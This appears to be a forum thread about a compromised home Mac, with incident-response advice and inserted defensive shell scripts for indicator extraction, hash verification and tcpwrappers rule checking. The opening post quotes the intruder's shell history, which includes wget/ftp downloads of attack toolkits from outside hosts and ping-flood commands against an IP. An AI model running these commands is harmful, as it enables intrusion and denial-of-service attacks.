#1
Prospect
Join Date: Aug 2002
Location: bend
Posts: 18

Hi y'all,

Found this little tidbit on a home machine while servicing. The user's ".bash_history" document reflects ftp downloads and software installs. The user is not a CLI user, at all. There is a PC on the home LAN, but no file-sharing is active. Got any opinions based on the following document excerpt? And any recommendations to prevent this from happening again -> aside from a router at the client's home, which is being installed now. I have wiped the HD, and re-installed the OS while off-network. I haven't seen a compromised Mac before, but this looks like the issue. Thanks for your opinions. File excerpt follows:

cd .x
ls
cd ..
tar czvf mechDarwin.tgz .x
ftp bambistuff.go.ro
ftp bambistuff.go.ro
w
w
ls
ddevc
cddev
ls
cd dev
ls
cd ..
ls
w
ps x
kill -9 721
cd /var/tmp
ls
cd ...
cd emech
ls
cd ..
rm -rf x
rm -rf .x
ftp bambistuff.go.ro
tar zxf mDarwin.tgz
cd .x
./sh
w
passwd
w
ls
ls
wget steaua87.go.ro/psyDarwin.tgz
ftp pacorabane.3x.ro/psyDarwin.tgz
ftp pacorabane.3x.ro
ftp pacorabane.3x.ro
ls
tar xzvf psyDarwin.tgz
ls
cd psybnc
ls
./psybnc
make
cd sites
cd ..
ls
cd sites
ls
cd ..
ls
tar zxvf mech.tgz
dir
ls
tar zxvf mech.tgz
cd psybnc
ls
cd config.h
wget
w
uptime
uname -a
ping
ping -c 9999 -s 25000 81.180.106.5
ping -c 9999 -s 8000 81.180.106.5
exit
w
exit
w
wget
ftp
ftp 193.230.153.143
tar xvzf psyBNC.tgz
cd psybnc
./psybnc
uname -a
s
passwd
wget geocities.com/teroristuro/psybnc.tar.gz
ls
wget irehs.home.ro/sshss.tar.gz
ps -aux
ls
tar zxfv psyDarwin.tgz
cd psybnc
ls
make
pico psybnc.conf
./psybnc
cd
ls
cd ..
ls
cd
ls
cd movies
ls
cd
cd Desktop
ls
cd /tmp
ls
mkdir uzi
ls
cd .uzi
cd /uzi
cd uzi
cd uzi
mkdir " "
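Added example, not part of the original post: a small POSIX shell script that pulls the network indicators out of a history dump like the one above, so the hosts can be looked up and reported. The sample history embedded in it is constructed from a handful of the commands quoted above; the function names and the "last argument is the target" heuristic are my own.

```shell
#!/bin/sh
# Added example (not from the original thread): pull network indicators out of
# a shell history so the remote hosts can be looked up and reported.
# Input is one command per line, exactly as .bash_history is stored on disk.

# Constructed sample: a handful of the commands quoted in the post above.
SAMPLE_HISTORY='cd .x
tar czvf mechDarwin.tgz .x
ftp bambistuff.go.ro
w
wget steaua87.go.ro/psyDarwin.tgz
ftp pacorabane.3x.ro/psyDarwin.tgz
ping -c 9999 -s 25000 81.180.106.5
ftp
ftp 193.230.153.143
wget geocities.com/teroristuro/psybnc.tar.gz
wget irehs.home.ro/sshss.tar.gz
ls'

# Hosts the attacker fetched tools from (ftp/wget targets), bare host or IP,
# one per line, de-duplicated. The target is taken to be the last argument,
# which holds for every ftp/wget invocation in this history; a bare "ftp"
# with no argument is skipped.
extract_download_hosts() {
    printf '%s\n' "$1" | awk '
        ($1 == "ftp" || $1 == "wget") && NF > 1 && $NF !~ /^-/ {
            t = $NF
            sub(/^[a-z]+:\/\//, "", t)   # drop a URL scheme if present
            sub(/\/.*/, "", t)           # drop the path, keep host or IP
            print t
        }' | sort -u
}

# Archives pulled down: the files worth copying off a read-only mount for
# analysis (never run them) and the URLs to hand to the host's abuse contact.
extract_fetched_files() {
    printf '%s\n' "$1" | awk '
        ($1 == "ftp" || $1 == "wget") && NF > 1 && $NF ~ /\.(tgz|tar\.gz|tar)$/ { print $NF }' |
        sort -u
}

# Addresses the machine was made to flood with oversized pings. These are the
# attacker's victims, not the attacker's infrastructure, so report them
# separately: that netblock's owner was on the receiving end.
extract_ping_targets() {
    printf '%s\n' "$1" | awk '$1 == "ping" && NF > 1 && $NF !~ /^-/ { print $NF }' | sort -u
}

printf 'download hosts:\n'; extract_download_hosts "$SAMPLE_HISTORY"
printf 'fetched files:\n';  extract_fetched_files "$SAMPLE_HISTORY"
printf 'ping targets:\n';   extract_ping_targets "$SAMPLE_HISTORY"
```

To run it over a real file from a clean boot with the suspect disk mounted, pass the file contents instead of the sample, e.g. `extract_download_hosts "$(cat /Volumes/Suspect/Users/someone/.bash_history)"`. The three lists are kept apart on purpose: download hosts and fetched files describe the attacker's tooling and go to the hosting providers, while the ping targets are the machines this Mac was used to attack.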
#2
Prospect
Join Date: Feb 2005
Posts: 9

Wow, good thing the cracker didn't waste the .bash_history.

What services were running on the machine? Did the user and/or root have a non-obvious password set? Here are some things to check:

1. Run last as root to check the last bunch of logins on the machine. This will only go from the start of wtmp, so you may want to check against some of the archived ones (/var/log/wtmp.*).
2. Run netstat -a | less to check for weird network services that may be running.
3. Turn on the firewall.

I would probably consider a re-install. Here is a link for psybnc: http://www.jestrix.net/tuts/psy.html It looks like they were setting the machine up as a bouncer for IRC. Another thing you might want to do is compare the sizes and md5's of some of the system utilities against a known good machine to be sure the commands aren't contaminated or anything.

Last edited by catfish; 02-09-2005 at 10:31 PM. Reason: found one of the toolkits
#3
Moderator
Join Date: Jan 2002
Location: Montreal
Posts: 29,279

When a machine has been compromised, you cannot trust anything that you get from that machine. The OS may have been modified to hide all changes. Even examining files on that machine's hard disk while mounted on another machine might be misleading as the compromised OS is still involved. The only sure thing to do is to erase the disk (using utilities external to the machine) and reinstall the OS from known good media. That is what the original poster did.
#4
Prospect
Join Date: Feb 2005
Posts: 45

I see you've already wiped the machine, but in the spirit of helping anyone else reading this, here are my tips for dealing with a compromised machine:

First of all, unplug the machine from the network, then back up any critical data on the machine. DO NOT back up any applications, then do a clean install. The only reason you would want to have the system still running is for forensic purposes.

Despite what catfish has suggested (no offense catfish), "strange services" may not appear even if the machine is compromised. A good rootkit will replace system utilities so their presence is masked. This is not limited to network services. Good rootkits can hide files from ls, installed kernel extensions, and various other "tell tale" signs of exploits. 'last' will not necessarily show any strange logins as it is very easy to either rewrite the wtmp (login) database, use a non-logging login daemon, or even have a "reverse" shell running that connects outbound instead of in.

Unless you need to perform an autopsy on this machine, reload the OS IMMEDIATELY. If you do need to perform an autopsy, install a new OS onto another drive and ONLY boot from that one, then mount the compromised drive and perform any tests you need. Do not try to run any applications or utilities directly from the compromised drive.

After you have a clean install that is uncompromised, change ALL of your passwords, especially Banks, Credit Card Companies, and any merchant that may have your credit card info on file (e.g. Amazon, Paypal, etc.). I cannot stress enough that you should not try to copy any programs from the compromised drive; there is no guarantee that they are not compromised as well....

I've spent several years in the UNIX security field so I've had experience with this (though mostly on Solaris, HP-UX, AIX and Linux; I'm new to OS X). Take my word for it, and treat this very seriously. Let me know if there is something that I can help you with and I'll do my best.

-Jonathan

Last edited by AntiGenX; 02-09-2005 at 11:09 PM.
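Added example, not code from either poster: a POSIX shell script that does the check catfish describes in #2 (compare hashes of system utilities against a known-good machine) in the way Jonathan insists on in #4 (boot a clean OS, mount the compromised drive, and never execute anything from it). A manifest is built on the trusted install; the suspect volume is then only read. The demo trees, tool names and the hidden ".x" directory it plants are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original thread): verify the binaries on a
# suspect volume against hashes taken from a known-good install. Run this from
# a clean boot with the suspect disk mounted read-only; nothing on the suspect
# volume is executed, it is only read, so a rootkit's replacement ls/ps/netstat
# cannot lie to it. The manifest is built first, on a trusted machine.

# SHA-256 with whichever tool is present (sha256sum on Linux, shasum on OS X).
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    elif command -v shasum >/dev/null 2>&1; then
        shasum -a 256 "$1" | cut -d' ' -f1
    else
        openssl dgst -sha256 "$1" | sed 's/.*= //'
    fi
}

# Manifest of every regular file under a trusted root: "<hash>  <relative path>".
build_manifest() {   # $1 = trusted root, e.g. /Volumes/CleanInstall/usr/bin
    root=$1
    ( cd "$root" && find . -type f | LC_ALL=C sort ) | while IFS= read -r rel; do
        printf '%s  %s\n' "$(hash_file "$root/$rel")" "$rel"
    done
}

# Compare a suspect root against a manifest. Prints one line per discrepancy:
# MODIFIED (contents differ), MISSING (gone), EXTRA (present but not in the
# manifest: attacker tools such as a hidden .x directory show up here).
verify_tree() {      # $1 = manifest file, $2 = suspect root
    manifest=$1; suspect=$2
    while read -r expected rel; do
        if [ ! -f "$suspect/$rel" ]; then
            printf 'MISSING  %s\n' "$rel"
        elif [ "$(hash_file "$suspect/$rel")" != "$expected" ]; then
            printf 'MODIFIED %s\n' "$rel"
        fi
    done < "$manifest"
    ( cd "$suspect" && find . -type f | LC_ALL=C sort ) | while IFS= read -r rel; do
        sed 's/^[0-9a-f]*  //' "$manifest" | grep -qxF -- "$rel" ||
            printf 'EXTRA    %s\n' "$rel"
    done
}

# Constructed demo: a tiny "clean" tree and a "suspect" tree with a replaced
# ps, a removed netstat and an attacker's hidden directory.
demo() {
    work=$(mktemp -d)
    mkdir -p "$work/good/bin" "$work/suspect/bin" "$work/suspect/.x"
    for tool in ls ps netstat; do printf 'genuine %s\n' "$tool" > "$work/good/bin/$tool"; done
    printf 'genuine ls\n'  > "$work/suspect/bin/ls"
    printf 'trojaned ps\n' > "$work/suspect/bin/ps"      # rootkit replacement
    printf 'bouncer\n'     > "$work/suspect/.x/psybnc"   # dropped tool
    build_manifest "$work/good" > "$work/manifest.txt"
    verify_tree "$work/manifest.txt" "$work/suspect"
    rm -rf "$work"
}

demo
```

The demo reports `MODIFIED ./bin/ps`, `MISSING ./bin/netstat` and `EXTRA ./.x/psybnc` and says nothing about the unchanged `ls`. In real use, `build_manifest /Volumes/CleanInstall/bin > manifest.txt` is run on the trusted machine and `verify_tree manifest.txt /Volumes/Suspect/bin` from the clean boot; the point of the clean boot is exactly hayne's in #3: on the running compromised system the hashing tool itself could be the thing that was replaced.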
#5
Prospect
Join Date: Feb 2005
Posts: 45

As a follow up:

I noticed that a geocities account was used to download a file...

While it might not be against their terms of service to have such files on the server, I'd bet that it is against their terms of service to use their systems to assist in compromising other systems. I would contact them and let them know that this account was used for that purpose. Also, there are several other IPs and domain names listed. You could use ARIN to look up the netblock owner for those IPs and email the ISP to let them know what's going on. Or you could try to let the FBI or your local law enforcement know, but they're usually ill equipped or too understaffed to help...

-Jonathan
#6
Moderator
Join Date: Jan 2002
Location: Montreal
Posts: 29,279

Done. (via their abuse reporting form)

[edit] That geocities URL now gives: "We're sorry, but this page is currently unavailable for viewing." - so I guess the account has been terminated. [/edit]

Last edited by hayne; 02-15-2005 at 02:22 AM.
#7
Hall of Famer
Join Date: Sep 2003
Location: Tokyo
Posts: 4,285

It looks like a script kiddie who's done a little homework. There are some navigation errors, a DOS command (dir), and `make` needs DevTools. Probably didn't know enough to cover his tracks well. One of the downloaded files contains a bunch of "h4ck3r 101 ph0r 5crip7 kiddi35" files. Still, compromise is compromise. Unless you want to be another Cliff Stoll, break out the install discs, beer and movies.
#8
All Star
Join Date: Dec 2004
Posts: 594

"psybnc" is a general irc relay/server. Maybe setting up a node on a warez distribution network, or else installing some zombie process that uses irc as the control channel?

"sshss" appears to be a remote scanner for ssh vulnerabilities, except it only runs on linux.
#9
Prospect
Join Date: Aug 2002
Location: bend
Posts: 18

Thanks to all!

I very much appreciate all your comments. And thanks to hayne for reporting to geocities. Basically have done what you all suggested. I believe this attack was initiated from within the LAN from the PC -> it is being checked now, and a firewall is being installed. I'll post anything new that I find.

Hah. Nice Clifford Stoll ref. Thanks again. See ya all soon. ag
#10
Prospect
Join Date: Feb 2005
Posts: 9

Hi All,

Sorry, I should have been more clear in my original post. My suggestions were for forensics of the cracked machine. I like to know what happened and why and where it is going. Of course a cracked machine is tainted goods and should be re-installed. I missed the part where he said he already formatted the machine.
#11
All Star
Join Date: Mar 2002
Location: Anchorage, AK
Posts: 640

This is the second post I have read on these forums where a Mac was cracked on a local network shared with PCs. All security flames aside, what would be the best way to run this sort of network and keep this from happening?
__________________
--- If you could have seen the things I have seen with your eyes.
#12
Major Leaguer
Join Date: Sep 2002
Posts: 349
#13
Major Leaguer
Join Date: Sep 2002
Posts: 349

Another security measure to take is to use tcpwrappers, which is pretty easy to implement:
http://www.hmug.org/HowTos/tcpwrappers.html
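Added example, not from the post or the linked how-to: a POSIX shell evaluator for a simplified subset of the hosts.allow/hosts.deny grammar that reproduces the order tcpd applies (hosts.allow first, then hosts.deny, and access granted if neither matches). The constructed rule files it builds show why a closing "ALL : ALL" in hosts.deny matters; the daemon names, addresses and function names are my own, and tcpd features such as EXCEPT, netmasks, KNOWN/UNKNOWN/PARANOID and user@host patterns are not handled.

```shell
#!/bin/sh
# Added example (not from the thread or the linked how-to): evaluate a
# (daemon, client) pair the way tcpd does, against hosts.allow and
# hosts.deny. Order matters: hosts.allow is consulted first, hosts.deny
# second, and if neither file has a matching rule access is GRANTED. That
# is why a final "ALL : ALL" in hosts.deny is the important line.
# Only a subset of the pattern grammar is handled (ALL, LOCAL, exact
# host/address, ".domain" suffix, "1.2.3." prefix); EXCEPT, netmasks,
# KNOWN/UNKNOWN/PARANOID and user@host forms are not.

client_matches() {   # $1 = client pattern, $2 = client host name or address
    pat=$1; client=$2
    case $pat in
        ALL)   return 0 ;;
        LOCAL) case $client in *.*) return 1 ;; *) return 0 ;; esac ;;   # no dot in name
        .*)    case $client in *"$pat") return 0 ;; esac; return 1 ;;     # domain suffix
        *.)    case $client in "$pat"*) return 0 ;; esac; return 1 ;;     # network prefix
        *)     [ "$pat" = "$client" ] ;;
    esac
}

# 0 if any rule in the file matches both the daemon and the client.
# Rule syntax: "daemon_list : client_list [: option]", '#' starts a comment.
file_matches() {     # $1 = rules file, $2 = daemon, $3 = client
    daemon=$2; client=$3
    while IFS= read -r line || [ -n "$line" ]; do
        line=${line%%#*}
        case $line in *:*) ;; *) continue ;; esac
        dlist=${line%%:*}
        rest=${line#*:}
        clist=${rest%%:*}
        daemon_hit=1
        for d in $(printf '%s' "$dlist" | tr ',' ' '); do
            if [ "$d" = ALL ] || [ "$d" = "$daemon" ]; then daemon_hit=0; fi
        done
        [ "$daemon_hit" -eq 0 ] || continue
        for c in $(printf '%s' "$clist" | tr ',' ' '); do
            if client_matches "$c" "$client"; then return 0; fi
        done
    done < "$1"
    return 1
}

# Prints ALLOW or DENY for the request.
tcpd_decision() {    # $1 = hosts.allow, $2 = hosts.deny, $3 = daemon, $4 = client
    if file_matches "$1" "$3" "$4"; then echo ALLOW
    elif file_matches "$2" "$3" "$4"; then echo DENY
    else echo ALLOW                       # tcpd default when nothing matches
    fi
}

# Constructed rule sets. hosts.deny carries the deny-everything-else line;
# hosts.deny.empty is the weak configuration that protects nothing.
make_demo_rules() {  # prints the directory it created
    d=$(mktemp -d)
    cat > "$d/hosts.allow" <<'EOF'
# sshd only from the home LAN or from a name with no domain part
sshd : 192.168.1. , LOCAL
EOF
    printf 'ALL : ALL\n' > "$d/hosts.deny"     # everything not allowed above is refused
    : > "$d/hosts.deny.empty"                  # the weak configuration
    echo "$d"
}

D=$(make_demo_rules)
for req in 'sshd 192.168.1.20' 'sshd 81.180.106.5' 'ftpd 192.168.1.20' 'sshd mac'; do
    set -- $req
    printf '%-5s %-15s good: %s  weak: %s\n' "$1" "$2" \
        "$(tcpd_decision "$D/hosts.allow" "$D/hosts.deny" "$1" "$2")" \
        "$(tcpd_decision "$D/hosts.allow" "$D/hosts.deny.empty" "$1" "$2")"
done
rm -rf "$D"
```

With the "good" pair, sshd from 192.168.1.20 or from an undotted local name is allowed and everything else, including ftpd from the LAN, is refused. With the same hosts.allow but an empty hosts.deny, every request that does not match hosts.allow falls through to tcpd's default and is allowed, so a hosts.allow on its own restricts nothing.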
#14
Hall of Famer
Join Date: Sep 2003
Location: Tokyo
Posts: 4,285

keylog the pc's, find an offender (any one if there are several), take him to the lobby and shoot* him. "Pour encourager les autres" as Voltaire so nicely put it.

* Substitute dismissal if summary executions are frowned upon in your municipality.
#15
All Star
Join Date: Mar 2002
Location: Anchorage, AK
Posts: 640

acme, you need to switch to decaf man. Do you think the PCs are sniffing the local network traffic? I guess we aren't going to learn from artgeek how they got in.
__________________
--- If you could have seen the things I have seen with your eyes.
#16
Moderator
Join Date: Jan 2002
Location: Montreal
Posts: 29,279

You should attempt to find out from your client what the configuration of the machine was. What accounts existed? What were their passwords? Who knew these passwords? Was "Remote Login" activated (in Sharing preferences)? Had the client downloaded any software from other than reputable sources? In particular, any software that asked for the admin password? Make the client aware that pirated versions of commercial software are often trojan horses. Try to make the client extremely leery of providing the admin password for anything other than software from reputable sources.
#17
Prospect
Join Date: Apr 2005
Posts: 2

Beware the sshs pkg downloaded: pscan2, contained within, is the Linux remote shell trojan. Obviously this won't run on your PPC, but if anyone is thinking of doing any forensics on the wget'ed archives (this one is Linux x86 based)... ;-)

Mohclips.